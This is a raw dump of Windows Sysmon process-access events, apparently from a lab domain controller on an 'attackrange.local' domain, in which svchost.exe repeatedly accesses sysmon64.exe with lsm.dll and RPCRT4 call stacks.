12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001764Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.580{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.565{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:01:01.549{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001741Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 